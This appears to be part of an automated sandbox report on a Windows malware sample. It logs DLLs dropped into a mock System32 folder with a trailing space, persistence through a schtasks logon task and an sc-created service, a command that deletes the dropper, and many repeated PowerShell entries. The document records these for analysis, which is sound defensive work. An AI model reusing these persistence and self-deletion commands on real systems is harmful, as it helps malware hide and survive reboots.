Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libssl-3-x64.dll
Source: C:\Users\user\Desktop\58VSNPxrI4.exe File created: C:\Windows \System32\printui.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\console_zero.exe
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libwinpthread-1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libintl-9.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\zlib1.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows \System32\printui.exe File created: C:\Windows\System32\libpq.dll
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\System32\winsvcf\x549596.dat

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f
Source: C:\Windows\System32\reg.exe Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\x939048\Parameters
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\sc.exe sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Users\user\Desktop\58VSNPxrI4.exe Process created: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5358
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4446
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7399
